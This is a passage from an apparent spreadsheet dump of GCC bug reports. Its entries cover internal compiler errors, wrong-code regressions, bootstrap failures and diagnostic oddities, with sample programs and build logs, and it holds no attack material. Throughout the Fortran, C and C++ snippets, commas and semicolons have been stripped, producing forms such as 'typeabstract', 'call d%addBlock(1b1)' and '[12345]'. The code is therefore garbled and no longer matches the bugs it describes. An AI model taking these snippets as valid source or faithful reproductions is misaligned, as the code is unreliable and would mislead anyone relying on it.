foo.c:1: error: '[*]' not allowed in other than a declaration</t>
  </si>
  <si>
    <t>GCC-54784</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] [OOP] wrong code in polymorphic allocation with SOURCE</t>
  </si>
  <si>
    <t>(Error also occurs with gcc 4.7.1)
When I have a container module with stores a collection of polymorphics types I sometimes get an error that a pointer is being freed which was not allocated. 
An example program is below. It can be compiled without errors
   gfortran bug.f90
It contains four modules each with an associated type. If the type 'block' in 'block_module' the member nFields is commented out the code runs fine.
If a print statement is added in the program the code runs fine
If the dimension of the member 'x' of types block_cart1d and block_cart2d are changed so that they are not 3 and 4 (only one must be changed) the program works.
Finally if the order in the program of the addBlock command is reversed the 
bug.f90
--------
module block_module
  implicit none
  private
  public :: block
  typeabstract :: block
    ! if commented out code works fine
    integer       private :: nFields      = 0
  end type block
end module block_module
module block1d_module
  use block_module only : block
  typeextends(block) :: block1d
    realdimension(:::)allocatableprivate :: fields
  end type
end module
module block2d_module
  use block_module only : block
  typeextends(block) :: block2d
    realdimension(::::)allocatableprivate :: fields
  end type
end module
module domain_module
  use block_module only : block
  implicit none
  type :: list
    class(block)allocatable :: B
  end type
  type :: domain
    type(list)dimension(10) :: L
  contains
    procedure :: addBlock
  end type
contains
  subroutine addBlock(thisib)
    implicit none
    class(domain)intent(inout) :: this
    integerintent(in) :: i
    class(block)intent(in) :: b
    allocate(this%L(i)%Bsource=b)
  end subroutine
end module
program bug
  use domain_module only : domain
  use block1d_module only : block1d
  use block2d_module only : block2d
  implicit none
  type(domain) :: d
  type(block1d) :: b1
  type(block2d) :: b2
  ! crashes with pointer being freed was not allocated
  call d%addBlock(1b1)
  call d%addBlock(2b2)
  ! crashes with invalid memory reference
  ! call d%addBlock(2b2)
  ! call d%addBlock(1b1)
  ! runs fine
  ! call d%addBlock(1b2)
  ! call d%addBlock(2b1)
end program  bug</t>
  </si>
  <si>
    <t>jkozdon</t>
  </si>
  <si>
    <t>GCC-57188</t>
  </si>
  <si>
    <t>[4.9 regression] Ada bootstrap broken on Solaris/x64: No_Implicit_Dynamic_Code violation</t>
  </si>
  <si>
    <t>For at least two weeks Ada bootstrap on Solaris/x64 (i.e. the 64-bit-default
configuration) is broken:
ro@arenal 26 &gt; ../../gnatbind -I- -I../rts -I. -I/vol/gcc/src/hg/trunk/local/gcc/ada -o b_gnatm.adb gnatmake.ali
error: system.ads has restriction No_Implicit_Dynamic_Code
error: but the following files violate this restriction:
error:   make.adb
error:   makeutl.adb
error:   prj.adb
error:   prj-env.adb
error:   prj-conf.adb
error:   prj-proc.adb
error:   prj-nmsc.adb
This doesn't happen in sparcv9-sun-solaris2* or i386-pc-solaris2* configurations.
  Rainer</t>
  </si>
  <si>
    <t>GCC-25879</t>
  </si>
  <si>
    <t>[4.2 Regression] TDF_CHAIN makes -fdump-tree-all-all useless</t>
  </si>
  <si>
    <t>A simple example like:
ypedef int nl_item
extern char *nl_langinfo (nl_item __item) __attribute__ ((__nothrow__))
char *
xtermEnvEncoding(void)
{
  static char *result
  if (result == 0) {
    result = nl_langinfo(1)
  }
  return result
}
---
and compile with -O2 -fdump-tree-pre-all makes the dump look like:
xtermEnvEncoding ()
{
  static charD.1 long intD.2 unsigned intD.3 long unsigned intD.4 long long intD.5 long long unsigned intD.6 short intD.7 short unsigned intD.8 signed charD.9 unsigned charD.10 D.11 D.12 D.13 D.14 D.15 D.16 D.17 D.18 D.19 D.20 floatD.21 doubleD.22 long doubleD.23 _Decimal32D.24 _Decimal64D.25 _Decimal128D.26 complex intD.27 complex floatD.28 complex doubleD.29 complex long doubleD.30 voidD.31 __builtin_va_listD.32 ......
Cut off for Bugzilla.
That junk makes -fdump-tree-all-all useless now.</t>
  </si>
  <si>
    <t>GCC-41523</t>
  </si>
  <si>
    <t>gcc generates few graph files with syntax errors</t>
  </si>
  <si>
    <t>gcc-4.3.2 and gcc-4.5.0 20090924 (experimental) snapshot generate few vcg files
with syntax errors because of a extra '}' in the graph.
it appears in gcc/graph.c print_rtl_graph_with_bb() sometimes called end_bb() without a start_bb() and this results in a extra '}' in the output generating
the parse error in the output graph.
to create the graphs running 'gcc -da -dv test.c' and many vcg files generated.
vcg graphs in a directory tested with a script using xvcg v1.3 like this:
#!/bin/sh
rm -v -f *.ps
pre=
rec=*.vcg
post=
for i in $pre${rec} do
    ./xvcg -silent -psoutput $i.ps $i
done
and xvcg reports the syntax errors in the graph when using gcc-4.5 as:
Syntax error (test.c.144r.into_cfglayout.vcg: l:410 p:7): Unexpected lexem GRAPH graph: (parse error) !
Syntax error (test.c.145r.jump.vcg: l:410 p:7): Unexpected lexem GRAPH graph: (parse error) !
Syntax error (test.c.169r.reginfo.vcg: l:410 p:7): Unexpected lexem GRAPH graph: (parse error) !
in gcc/graph.c added a check to suppress end_bb() when start_bb() is not called and the graph output files are oke.
also noted that in some files the basic block starts with 4 not 2.
have made a patched graph.c file which works if you are interested.
system used is 32bits suse linux 11.1 uname -a:
Linux linux-ls7d.perpektiefinternet.nl 2.6.27.29-0.1-default #1 SMP 2009-08-15 17:53:59 +0200 i686 i686 i386 GNU/Linux</t>
  </si>
  <si>
    <t>GCC-6066</t>
  </si>
  <si>
    <t>incorrect error message compiling classpath</t>
  </si>
  <si>
    <t>gcj fails to build the current Classpath:
creche. gcj -C -d . @classes
./../../classpath/java/util/AbstractMap.java:530: Superinterface `Entry' of class `java.util.AbstractMap$BasicMapEntry' not found.
     static class BasicMapEntry implements Entry
                                           ^
./../../classpath/java/util/AbstractMap.java:0: confused by earlier errors bailing out
Entry is a nested interface of Map.
BasicMapEntry implements Entry and AbstractMap implements Map.
The code is correct.
Release:
gcj (GCC) 3.1 20020324 (prerelease)
Environment:
x86 RHL 6.2</t>
  </si>
  <si>
    <t>GCC-45969</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE in build_binary_op at c-typeck.c:9833</t>
  </si>
  <si>
    <t>void crash() {
    double l[4]
    if((l[0]+l[2]) &amp;&amp; (l[1]+l[3])){
    }
}
/space/rguenther/install/gcc-4.5.1/bin/gcc -c t.c -std=c89 -m32
t.c: In function 'crash':
t.c:3:5: internal compiler error: in build_binary_op at c-typeck.c:9833
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-40739</t>
  </si>
  <si>
    <t>[LTO] ICE in bp_pack_value at lto-streamer.c:336</t>
  </si>
  <si>
    <t>$ cat ~/hw.c
int main() {
  printf(hello world\n)
}
ryan@ryan:~/gcc/lto-branch/x86-build/gcc$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: i686-pc-linux-gnu
Configured with: ../configure --enable-languages=c --enable-lto --disable-bootstrap
Thread model: posix
gcc version 4.5.0 20090706 (experimental) [lto revision 149615] (lto merged with rev 149291)
ryan@ryan:~/gcc/lto-branch/x86-build/gcc$ ./xgcc -B. ~/hw.c -flto
/home/ryan/hw.c: In function Ã¢mainÃ¢:
/home/ryan/hw.c:3:3: warning: incompatible implicit declaration of built-in function Ã¢printfÃ¢
/home/ryan/hw.c:4:1: internal compiler error: in bp_pack_value at lto-streamer.c:336
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-53898</t>
  </si>
  <si>
    <t>[4.8 regression] bootstrap failure: graphite-optimize-isl.c: ISO C forbids an empty translation unit</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.8-20120708 on x86_64-linux with --disable-build-poststage1-with-cxx and no cloog installed fails for me with:
/mnt/scratch/objdir48/./prev-gcc/xgcc -B/mnt/scratch/objdir48/./prev-gcc/ -B/mnt/scratch/install48/x86_64-unknown-linux-gnu/bin/ -B/mnt/scratch/install48/x86_64-unknown-linux-gnu/bin/ -B/mnt/scratch/install48/x86_64-unknown-linux-gnu/lib/ -isystem /mnt/scratch/install48/x86_64-unknown-linux-gnu/include -isystem /mnt/scratch/install48/x86_64-unknown-linux-gnu/sys-include    -c   -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat   -DHAVE_CONFIG_H -I. -I. -I/mnt/scratch/gcc-4.8-20120708/gcc -I/mnt/scratch/gcc-4.8-20120708/gcc/. -I/mnt/scratch/gcc-4.8-20120708/gcc/../include -I/mnt/scratch/gcc-4.8-20120708/gcc/../libcpp/include -I/home/mikpe/pkgs/linux-x86_64/gmp-5.0.5/include -I/home/mikpe/pkgs/linux-x86_64/mpfr-3.1.1/include -I/home/mikpe/pkgs/linux-x86_64/mpc-0.9/include  -I/mnt/scratch/gcc-4.8-20120708/gcc/../libdecnumber -I/mnt/scratch/gcc-4.8-20120708/gcc/../libdecnumber/bid -I../libdecnumber    /mnt/scratch/gcc-4.8-20120708/gcc/graphite-optimize-isl.c -o graphite-optimize-isl.o
/mnt/scratch/gcc-4.8-20120708/gcc/graphite-optimize-isl.c:471:0: error: ISO C forbids an empty translation unit [-Werror=pedantic]
 #endif
 ^
cc1: all warnings being treated as errors
make[3]: *** [graphite-optimize-isl.o] Error 1
make[3]: Leaving directory `/mnt/scratch/objdir48/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir48'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir48'
make: *** [bootstrap] Error 2
This is a regression from 4.8-20120701 which bootstrapped fine.
Apart from the standard preamble all of graphite-optimize-isl.c is inside an #ifdef HAVE_cloog.  I would suggest either not compiling this file at all when !HAVE_cloog or to drop -Werror when compiling it.
For now I'm resuming my build with an
#else
int this_is_silly
inserted before the trailing #endif.</t>
  </si>
  <si>
    <t>GCC-45440</t>
  </si>
  <si>
    <t>[F03] ALLOCATE with SOURCE gives an ICE (segfault)</t>
  </si>
  <si>
    <t>The following segfaults with the current trunk a 20100701 trunk and a 4.5.1 build.
type t
  integer :: x
  real :: y(5)
  logical allocatable :: z(:)
end type t
type(t) :: mt
mt%x = 1
mt%y = [12345]
allocate ( mt%z source = [ .true. .false. .true.]) ! &lt;&lt;&lt; ICE(segfault)
print * mt%x
print * mt%y
print * mt%z
!print * mt ! Invalid - ultimate allocatable component
end
Expected: As with ifort and crayftn: It compiles and ./a.out prints
 1
 1.  2.  3.  4.  5.
 T  F  T</t>
  </si>
  <si>
    <t>GCC-83723</t>
  </si>
  <si>
    <t>[8 Regression] ICE: in gen_rtx_SUBREG at emit-rtl.c:1010</t>
  </si>
  <si>
    <t>seen with r256272 on i686-linux-gnu worked around with -O1
$ cat debris.ii
int a()
void b()
void c(float)
float d()
int *e
void f() {
  float g = d()
  c(g)
  if (e)
    b()
  if (g &lt; 1.0)
    g = a() / g
}
$ g++ -c -g -O2 -mfpmath=sse -msse -msse2 -ansi -funroll-loops -fsigned-char debris.ii           
during RTL pass: reload
debris.ii: In function 'void f()':
debris.ii:13:1: internal compiler error: in gen_rtx_SUBREG at emit-rtl.c:1010
 }
 ^
0x81c19b8 gen_rtx_SUBREG(machine_mode rtx_def* poly_int)
        ../../src/gcc/emit-rtl.c:1010
0x86d8a89 lra_substitute_pseudo(rtx_def** int rtx_def* bool)
        ../../src/gcc/lra.c:1936
0x86d8b45 lra_substitute_pseudo(rtx_def** int rtx_def* bool)
        ../../src/gcc/lra.c:1950
0x86d8b45 lra_substitute_pseudo(rtx_def** int rtx_def* bool)
        ../../src/gcc/lra.c:1950
0x86d8c02 lra_substitute_pseudo_within_insn(rtx_insn* int rtx_def* bool)
        ../../src/gcc/lra.c:1973
0x86ec39e remove_inheritance_pseudos
        ../../src/gcc/lra-constraints.c:6769
0x86ec39e lra_undo_inheritance()
        ../../src/gcc/lra-constraints.c:6970
0x86d954b lra(_IO_FILE*)
        ../../src/gcc/lra.c:2471
0x8698747 do_reload
        ../../src/gcc/ira.c:5462
0x8698747 execute
        ../../src/gcc/ira.c:5646
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-8226</t>
  </si>
  <si>
    <t>g++ unable to complete compilation</t>
  </si>
  <si>
    <t>Compilation of this file only succeeds with optimisation disabled. Using any level beyond zero results in the compilator never terminating the work and allocating an increasing amount of memory (I saw up to 300 Mb before stopping).
The problem is systematic.
Release:
2.96
Environment:
Mandrake linux 8.2
How-To-Repeat:
g++ -DHAVE_CONFIG_H -I. -I/home/sauron/cemento/cemento -I..   -DNDEBUG -DNO_DEBUG -O2 -O0 -Wall -I/usr/include/SDL -I/usr/include/paragui -I/usr/include/freetype2 -fno_exceptions -fno-check-new -fexceptions .c resources.cpp</t>
  </si>
  <si>
    <t>kalbun</t>
  </si>
  <si>
    <t>GCC-31273</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] Erroneous bitfield conversions to boolean values</t>
  </si>
  <si>
    <t>The following code compiles fine in GCC 4.1.
	enum E { e }
	struct S {
	  E v:5
	}
	S s
	int main() { if (!s.v) return 0 }
In 4.2 (20070307) it gives the following error:
	test.cpp: In function 'int main()':
	test02.cpp:6: error: could not convert 's.S::v' to 'bool'
	test02.cpp:6: error: in arguument to unary !
Jim Wilson has suggested this is a bug due to recent patches to the 4.2 branch.</t>
  </si>
  <si>
    <t>eric.lemings</t>
  </si>
  <si>
    <t>GCC-58484</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in chrec_fold_plus_1 at tree-chrec.c:272 building 416.gamess</t>
  </si>
  <si>
    <t>&gt; ./f951 -quiet mp2.fppized.f -O2
mp2.fppized.f: In function 'umpse':
mp2.fppized.f:2889:0: internal compiler error: in chrec_fold_plus_1 at tree-chrec.c:272
       SUBROUTINE UMPSE(EAAIBJNOCNDIMNOCANVIRANOCCAIOCAE2)
 ^
0x12b7434 chrec_fold_plus_1
        /space/rguenther/src/svn/trunk/gcc/tree-chrec.c:271
0x12b7cea chrec_fold_plus(tree_node* tree_node* tree_node*)
        /space/rguenther/src/svn/trunk/gcc/tree-chrec.c:373
0xcebd7b instantiate_scev_binary
        /space/rguenther/src/svn/trunk/gcc/tree-scalar-evolution.c:2347
from a quick look instantiate_scev_r for some reason doesn't do its work
properly.</t>
  </si>
  <si>
    <t>GCC-9671</t>
  </si>
  <si>
    <t>gcc.3.2.2 do not build on a HP Tru64 Unix v5.1B system</t>
  </si>
  <si>
    <t>Gcc 3.2.2 fails to build on a Tru64 UNIX V5.1B system.
gcc -DIN_GCC    -g  -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H  -o cc1 \
        c-parse.o c-lang.o attribs.o c-errors.o c-lex.o c-pragma.o c-decl.o c-typeck.o c-convert.o c-aux-info.o c-common.o c-format.o c-semantics.o c-objc-common.o libcpp.a  main.o libbackend.a ./intl/libintl.a  -liconv  ../libiberty/libiberty.a
_F64__F64_stat
_F64__F64_fstat
_F64__F64_lstat
collect2: ld returned 1 exit status
make[2]: *** [cc1] Error 1
make[2]: Leaving directory `/usr/users/olle/objdir/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/usr/users/olle/objdir/gcc'
make: *** [bootstrap] Error 2
For some reason the file cppinit.o and cppfiles.o generetes
incorrect external references The F64 prefix is doubled
Release:
unknown
Environment:
HP Tru64 Unix 5.1B using gcc-3.2.2 build on a 5.1A system and
gnu make
How-To-Repeat:
ALways</t>
  </si>
  <si>
    <t>olle</t>
  </si>
  <si>
    <t>GCC-5248</t>
  </si>
  <si>
    <t>I can't get bootstrap to work.</t>
  </si>
  <si>
    <t>I sent this in a few days ago but used a text-based interface
which filled in my e-mail address derived from my machine name.
Unfortunately I realized afterwards that I may not be able
to receive mail to that machine so I'm resubmitting with a
different e-mail address.
I did a make bootstrap and I'm getting all kinds of 
differs messages.  Here's a look at the output:
Bootstrap comparison failure!
alias.o differs
alloca.o differs
bb-reorder.o differs
.
.
.
java/verify.o differs
java/xref.o differs
java/zextract.o differs
make[1]: *** [compare] Error 1
make[1]: Leaving directory `/tmp/sw/gcc/gcc-3.0.3/gcc'
make: *** [bootstrap] Error 2
Any ideas?  I can send the entire make output if you'd like.
Thanks
Jim Marselle
Release:
gcc 3.0.3
Environment:
HPUX 11.0</t>
  </si>
  <si>
    <t>james.marselle</t>
  </si>
  <si>
    <t>GCC-6512</t>
  </si>
  <si>
    <t>3.1 segfault in copyprop_hardreg_forward_1 on sparc-sun-solaris2.8</t>
  </si>
  <si>
    <t>Compiling this file
http://www.math.purdue.edu/~lucier/GNATS/GNATS-5/nucleic.i.gz
inside gdb results in the following segfault
Starting program: /pkgs/gcc-3.1/lib/gcc-lib/sparc-sun-solaris2.8/3.1/cc1 -fomit-frame-pointer -O1 -fschedule-insns2 -fno-strict-aliasing -fno-math-errno -mcpu=ultrasparc -mtune=ultrasparc -m32 nucleic.i
 ___H__20_nucleic {GC 14760k -&gt; 4922k} {GC 6533k -&gt; 5160k} {GC 7382k -&gt; 5143k} {GC 7652k -&gt; 5440k}
Program received signal SIGSEGV Segmentation fault.
copyprop_hardreg_forward_1 (bb=0x13bd468 vd=0x1df46bc)
    at ../../gcc/regrename.c:1564
1564                recog_op_alt[i][alt].class = recog_op_alt[matches][alt].class
(gdb) p i
$1 = 0
(gdb) p alt
$2 = -1
(gdb) p matches
$3 = 16842752
(gdb) list
1559          predicated = GET_CODE (PATTERN (insn)) == COND_EXEC
1560          for (i = 0 i &lt; n_ops ++i)
1561            {
1562              int matches = recog_op_alt[i][alt].matches
1563              if (matches &gt;= 0)
1564                recog_op_alt[i][alt].class = recog_op_alt[matches][alt].class
1565              if (matches &gt;= 0 || recog_op_alt[i][alt].matched &gt;= 0
1566                  || (predicated &amp;&amp; recog_data.operand_type[i] == OP_OUT))
1567                recog_data.operand_type[i] = OP_INOUT
1568            }
(gdb)
Release:
3.1 20020429 (prerelease)
Environment:
sparc-sun-solaris2.8
Solaris as/ld/sh</t>
  </si>
  <si>
    <t>GCC-65937</t>
  </si>
  <si>
    <t>FAIL: gcc.target/arm/pr26702.c scan-assembler \\.size[\\t ]+static_foo 4</t>
  </si>
  <si>
    <t>Newly introduced test case failed on arm-none-linux-gnueabi/arm-none-linux-gnueabihf
arm-none-linux-gnueabi GCC was configured with
gcc/configure --target=arm-none-linux-gnueabi --prefix= --with-sysroot=/home/... --enable-shared --disable-libsanitizer --disable-libssp --disable-libmudflap --with-plugin-ld=arm-none-linux-gnueabi-ld --enable-checking=yes --enable-languages=cc++fortran --with-gmp=... --with-mpfr=... --with-mpc=... --with-isl=... --with-cloog=... --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=softfp --with-arch=armv7-a
Thanks
bin</t>
  </si>
  <si>
    <t>GCC-9859</t>
  </si>
  <si>
    <t>[scheduler] excessive memory consumption on GTK file</t>
  </si>
  <si>
    <t>gcc 3.2.2 failed to compile interface-glade2.c from gtk-gnutella 0.91.9 with -O2 option. This file has more than 10000 lines. The compiler exited because the memory was exhausted.
You may download gtk-gnutella from sourceforge.net/projects/gtk-gnutella/
The preprocessed file is attached.
Release:
gcc version 3.2.2
Environment:
Pentium 4 256M Ram Linux 2.4.18 glibc 2.3.1</t>
  </si>
  <si>
    <t>CLASSPATH-22936</t>
  </si>
  <si>
    <t>Configure - couldn't find antlr.jar</t>
  </si>
  <si>
    <t>I downloaded gjdoc-0.7.4 and ran 'configure' - it reports:
checking for antlr 2.7.1 or better... configure: error: no suitable antlr.jar found for version 2.7.1
I'm running Gentoo Linux with antlr 2.7.3 installed via portage and needed to run:
configure --with-antlr-jar=/usr/share/antlr/lib/antlr.jar
...to make this work.  Is this a location that the configure script should look at automatically?  (I don't know anything about this stuff just thought I'd report my experience).</t>
  </si>
  <si>
    <t>GCC-10190</t>
  </si>
  <si>
    <t>[IRIX] building gcc 3.2.2 on irix 5.3 fails</t>
  </si>
  <si>
    <t>I've attempted to follow the instructions to try and get
gcc-3.2.2 to compile on irix 5.3 (with the SGI 5.3 IDO 
installed and all available public patches applied)
I have a failure in the comparison section between
stages.  There is advice in the INSTALL/specifics.html
section to add '-save-temps' to CFLAGS.
Unfortunately this doesn't say which CFLAGS and in
any case attempting to follow this simply results in a
failure with the inability to see this as a valid flag.
Advice appreciated - it's also possible to give people
an account on this irix 5.3 box for gcc testing purposes.
Currently i am trying to get gcc 3.2.2 installed so that 
the mainainer of perl 5.8.0 can try porting using it
instead of sgi CC..
regards
-jason
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-14143</t>
  </si>
  <si>
    <t>Overeager ADL</t>
  </si>
  <si>
    <t>The following should compile.  fu::bar::baz is not a template-id 
and therefore axe:: should not be considered to be an associated namespace in 
the call to f.
-------
namespace fu
{
  template 
  struct bar
  {
      struct baz {}
  }
}
namespace axe
{
  struct handle {}
  template 
  char* f(T
}
namespace test
{
  template 
  int f(T const
  template 
  int g(T x) { return f(x) }
  int x = g(fu::bar::baz())
}</t>
  </si>
  <si>
    <t>GCC-71705</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in lower_omp_target at omp-low.c:16136</t>
  </si>
  <si>
    <t>With a missing save attribute :
$ cat z1.f90
subroutine s
   real :: x
   x = 0.0
   !$omp target update to(x)
   !$omp target
   x = x + 1.0
   !$omp end target
end
$ gfortran-6 -g -O0 -Wall -fcheck=all -fopenmp -c z1.f90
z1.f90:4:0:
    !$omp target update to(x)
internal compiler error: in lower_omp_target at omp-low.c:16135</t>
  </si>
  <si>
    <t>GCC-77670</t>
  </si>
  <si>
    <t>PowerPC64 Spec 2006 fails on 453.povray using -mcpu=power9 -mpower9-minmax</t>
  </si>
  <si>
    <t>Created attachment 39662
-save-temps file (cut down) that shows the problem
The new min/max instructions in PowerPC ISA 3.0 generate an insn not found error.  Note these instructions are not currently enabled with -mcpu=power9 they are enabled with a separate switch: -mpower9-minmax.  It is likely that the same bug appears in GCC 6.2.
To replicate compile the attached .ii file with -O3 -mcpu=power9 -mpower9-minmax -ffast-math -w.  The following error is generated:
hcmplx.cpp: In function 'void pov::Normal_Calc_HCompl_Reciprocal(double* int pov::FRACTAL*)':
hcmplx.cpp:891:1: error: unrecognizable insn:
(insn 62 61 63 5 (parallel [
            (set (reg:DF 305)
                (if_then_else:DF (ne:CCFP (reg:DF 310)
                        (reg/v:DF 230 [ det ]))
                    (reg:DF 309)
                    (reg/v:DF 203 [ xx ])))
            (clobber (scratch:V2DI))
        ]) -1
     (nil))
hcmplx.cpp:891:1: internal compiler error: in extract_insn at recog.c:2310
0x10a83fe3 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /home/meissner/fsf-src/trunk-240142/gcc/rtl-error.c:108
0x10a84047 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /home/meissner/fsf-src/trunk-240142/gcc/rtl-error.c:116
0x10a49a1b extract_insn(rtx_insn*)
        /home/meissner/fsf-src/trunk-240142/gcc/recog.c:2310
0x10791fbb instantiate_virtual_regs_in_insn
        /home/meissner/fsf-src/trunk-240142/gcc/function.c:1580
0x10791fbb instantiate_virtual_regs
        /home/meissner/fsf-src/trunk-240142/gcc/function.c:1948
0x10791fbb execute
        /home/meissner/fsf-src/trunk-240142/gcc/function.c:1997
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Similar errors occur on the gamess and soplex benchmarks.
The reason this occurs it creates a floating point CMOVE instruction with a NE.  The way to fix it is to provide insns to invert the sense of the test.</t>
  </si>
  <si>
    <t>GCC-27890</t>
  </si>
  <si>
    <t>[4.2 regression] lib/logging.properties pollutes common namespace</t>
  </si>
  <si>
    <t>Now that I can build libgcj again on HEAD I found that it pollutes the
common namespace by installing $PREFIX/lib/logging.properties.
This break the installation of several versions of GCC into the same $PREFIX
using --program-suffix=.</t>
  </si>
  <si>
    <t>GCC-58123</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] debug line not tracked for last autovariable dtor</t>
  </si>
  <si>
    <t>PASS: g++ (GCC) 4.7.3 20130221 (prerelease)
 - it did not generate separate line info for destructors at all
FAIL: g++ (GCC) 4.8.2 20130811 (prerelease)
FAIL: g++ (GCC) 4.9.0 20130811 (experimental)
class C {
public:
  C() {}
  ~C() {}
  int m() { return 0 }
}
/*  7 */ int main() {
/*  8 */   C a
/*  9 */   C b
/* 10 */   C c
/* 11 */   return a.m() + b.m() + c.m()
/* 12 */ }
----------------------------------------------------------------------------
g++-4.7:
(gdb) start
8	/*  8 */   C a
(gdb) next
9	/*  9 */   C b
(gdb) next
10	/* 10 */   C c
(gdb) next
11	/* 11 */   return a.m() + b.m() + c.m()
(gdb) next
12	/* 12 */ }
----------------------------------------------------------------------------
g++-4.8: each destructor has its own .debug_line entry:
(gdb) start
8	/*  8 */   C a
(gdb) next
9	/*  9 */   C b
(gdb) next
10	/* 10 */   C c
(gdb) next
11	/* 11 */   return a.m() + b.m() + c.m()
(gdb) next
10	/* 10 */   C c
(gdb) next
9	/*  9 */   C b
(gdb) next
################## Missing: /*  8 */   C a
11	/* 11 */   return a.m() + b.m() + c.m()
(gdb) next
12	/* 12 */ }
except for the last one:
/home/jkratoch/t/example2.C:10
  4005f7:       48 8d 45 ed             lea    -0x13(%rbp)%rax
  4005fb:       48 89 c7                mov    %rax%rdi
  4005fe:       e8 2b 00 00 00          callq  40062e 
/home/jkratoch/t/example2.C:9
  400603:       48 8d 45 ee             lea    -0x12(%rbp)%rax
  400607:       48 89 c7                mov    %rax%rdi
  40060a:       e8 1f 00 00 00          callq  40062e 
/home/jkratoch/t/example2.C:11
############################^^ here should be :8
  40060f:       48 8d 45 ef             lea    -0x11(%rbp)%rax
  400613:       48 89 c7                mov    %rax%rdi
  400616:       e8 13 00 00 00          callq  40062e 
############################ Missing debug line for :11 or :12 here:
  40061b:       89 d8                   mov    %ebx%eax
/home/jkratoch/t/example2.C:12
  40061d:       48 83 c4 18             add    $0x18%rsp
  400621:       5b                      pop    %rbx
  400622:       5d                      pop    %rbp
  400623:       c3                      retq   
Downstream user bugreport: https://bugzilla.redhat.com/show_bug.cgi?id=995804</t>
  </si>
  <si>
    <t>GCC-19168</t>
  </si>
  <si>
    <t>Mismatched KINDs in SELECT CASE constucts is not handled correctly</t>
  </si>
  <si>
    <t>Consider this program posted by James Van Buskirk in c.l.f.
gfortran currently issues an error because the KIND of 7 and
200 do not match the KIND of x.
program case_ex
   implicit none
   integer parameter :: ik1 = selected_int_kind(2)
   integer(ik1) x
   integer io
   write(*'(a)'advance='no'iostat=io) ' Enter the value of x:&gt; '
   read(**) x
   if(io /= 0) x = 0
   select case(x)
   case(7)
      write(*'(a)') ' Sorry bad guess.'
   case(200)
      write(*'(a)') ' You win the prize!'
   case default
      write(*'(a)') ' You aren''t even trying.'
   end select
end program case_ex
The relevant constraint from the Fortran standard is 
  C805 (R808) For a given case-construct each case-value shall be of
  the same type as case-expr.  For character type length differences
  are allowed but the kind type parameters shall be the same.  */
and we note no such requirement of the KIND for INTEGER and LOGICAL
variables must match.
In the discussion on c.l.f Richard Maine pointed out that the 
normal promotion rules for numeric rational operation should be
followed.
An initial patch was posted to http://gcc.gnu.org/ml/fortran/2004-12/msg00179.html
but it was deemed incorrect.
-- 
steve</t>
  </si>
  <si>
    <t>GCC-10548</t>
  </si>
  <si>
    <t>Strange 'file:line:number: preprocessor error'</t>
  </si>
  <si>
    <t xml:space="preserve">From: Andrew Pinski 
To: Hallvard B Furuseth 
Cc: Andrew Pinski  gcc-gnats@gcc.gnu.org
Subject: Re: preprocessor/10548: Strange 'file:line:number: preprocessor error'
Date: Tue 29 Apr 2003 14:45:59 -0400
 This is not a bug as already pointed out but 13 is the column at which 
 foo(00) ends.
 On Tuesday Apr 29 2003 at 14:20 US/Eastern Hallvard B Furuseth 
 wrote:
 &gt;
 &gt;&gt; Number:         10548
 &gt;&gt; Category:       preprocessor
 &gt;&gt; Synopsis:       Strange 'file:line:number: preprocessor error'
 &gt;&gt; Confidential:   no
 &gt;&gt; Severity:       non-critical
 &gt;&gt; Priority:       medium
 &gt;&gt; Responsible:    unassigned
 &gt;&gt; State:          open
 &gt;&gt; Class:          sw-bug
 &gt;&gt; Submitter-Id:   net
 &gt;&gt; Arrival-Date:   Tue Apr 29 18:26:00 UTC 2003
 &gt;&gt; Closed-Date:
 &gt;&gt; Last-Modified:
 &gt;&gt; Originator:     Hallvard B Furuseth
 &gt;&gt; Release:        3.2.3
 &gt;&gt; Organization:
 &gt; University of Oslo
 &gt;&gt; Environment:
 &gt; System: SunOS bombur.uio.no 5.8 Generic_108528-13 sun4u sparc 
 &gt; SUNWUltra-5_10
 &gt; Architecture: sun4
 &gt;
 &gt; 	
 &gt; host: sparc-sun-solaris2.8
 &gt; build: sparc-sun-solaris2.8
 &gt; target: sparc-sun-solaris2.8
 &gt; configured with: ../gcc-3.2.3/configure --enable-languages=cc++f77 
 &gt; --disable-shared --disable-multilib --prefix=/usit/bombur/hbf 
 &gt; --enable-version-specific-runtime-libs --enable-threads
 &gt;&gt; Description:
 &gt;
 &gt; The preprocessor gives a strange error message
 &gt; a.c:3:13: macro foo passed 2 arguments but takes just 1
 &gt; 3 is the line number but I don't know what 13 is.
 &gt;
 &gt;&gt; How-To-Repeat:
 &gt;
 &gt; $ cat a.c
 &gt; #define foo(x) bar
 &gt;
 &gt; int foo(0 0)
 &gt; $ gcc -S a.c
 &gt; a.c:3:13: macro foo passed 2 arguments but takes just 1
 &gt;&gt; Fix:
 &gt;&gt; Release-Note:
 &gt;&gt; Audit-Trail:
 &gt;&gt; Unformatted:
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t>GCC-33373</t>
  </si>
  <si>
